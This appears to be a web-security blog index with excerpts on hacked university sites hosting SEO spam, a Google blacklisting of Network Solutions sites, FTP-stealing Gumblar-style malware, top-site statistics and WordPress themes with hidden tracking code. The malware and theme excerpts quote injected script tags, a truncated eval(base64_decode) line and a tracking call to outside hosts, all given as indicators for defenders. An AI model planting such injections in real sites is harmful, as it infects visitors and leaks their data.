UFSC.br – Brazilian University hosting SEO SPAM

UFSC.br (Brazilian Federal university in Santa Catarina), one of the biggest universities in Brazil, is hosting SEO SPAM on almost all their departamental web sites:

http://www.sead.ufsc.br – Department for distant education
http://cco.inf.ufsc.br/ – Computer science department (using WordPress 2.2)
http://www.lec.ufsc.br/ – Engineering department
http://emc.ufsc.br – Mechanical engineering department
http://www.ndi.ufsc.br/ – Department for child development
http://www.bu.ufsc.br/ – Library department
www.dssmovimentossociais.ufsc.br

http://www.infosam.ufsc.br/

And I could go on and on with this list. Most of them are using old versions of WordPress and Joomla, explaining how they got hacked.


Read More

Blacklisted sites at Netsol

In the last few days many sites hosted at Network Solution got blacklisted by Google. In all of them the report from Google was:

URL: sitename
Last checked: June 2, 2010
General problem
When Google last tested this page, no content was returned from your server.
Instead, the browser was redirected to a malicious web page. It is likely
that your server configuration has been modified.

On the ones that we manually checked, the sites were clean and malware-free (no redirection). They were all hosted at the IP address 205.178.145.65, and it looks like that their other servers didn’t get affected.

What happened? It seems that either that server got compromised affecting all sites on it or a bug on Google’s malware checker.

If your site got blacklisted and it says on the warning page something along these lines: (and you are hosting at that IP address)

Read More

Web site security – It starts with your desktop

If you have a web site and you want it to be secure, the first place you have protect is your desktop.

Recently (well, since 2009), a large number of sites have been infected with malware and blacklisted due to a few desktop virus (generally called Gumblar, port 8080, etc). These virus steals your FTP password and does the following things:

Infects all .js files on your site with entries like this one:

document.write( <script src="http://wap.northernplumbingandheating.com/assets/postinfo.php
document.write( <script src=http://salsafestival-berlin.de/_fpclass/BannerWebseite2009.php

It infects every .html files with entries similar to this:

script src="http://wap.northernplumbingandheating.com/assets/postinfo.php"
script src="http://shopping-dubai.com/images/runActiveContent.php"
script src="http://stb-umhau.de/images/muffin35.php"
script src="http://salsafestival-berlin.de/_fpclass/BannerWebseite2009.php"

Every PHP file with a code similar to this one:

eval(  base64_decode(" aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEd
MT0JBTF..


Read More

Google top 1000 sites: Interesting stats about them

Google recently published a list with the top 1000 most visited web sites in the world. We found that list very interesting and decided to take a closer look at them.

These are stats we took:

  1. Web servers in use
  2. Programming language in use
  3. Sites using WordPress
  4. Sites using Jquery
  5. Sites using Google Adsense
  6. Sites using Google Analytics
  7. Sites that doesn’t work without the www
  8. Sites using China Cache

A few of these numbers really amazed us. Nginx, for example, was used in 15% of the sites, very close to IIS with only 17%. Jquery is being used in almost 30% of the top sites and 42% are using Google analytics.

Read More

WordPress user: Be careful where you get your theme from

WordPress themes are not just design templates, they contain PHP code and must be validated before use. Not only because of bugs, but some may contain malicious code in there. Specially if you download from random web sites and not from WordPress.org (not saying that every theme at WordPress.org is safe).

One example popped this week, regarding the themes from http://hirewordpressexperts.com/. They added some hidden code inside their themes to track which sites are using them (and track the users as well). However, their tracking server went offline and every site using it got this error on the sidebar:

Warning: file_get_contents(
http://24365online.com/_YTG_yu/_dl/get_info.php?host=site&referer;=&visitor;_ip=ip)


Read More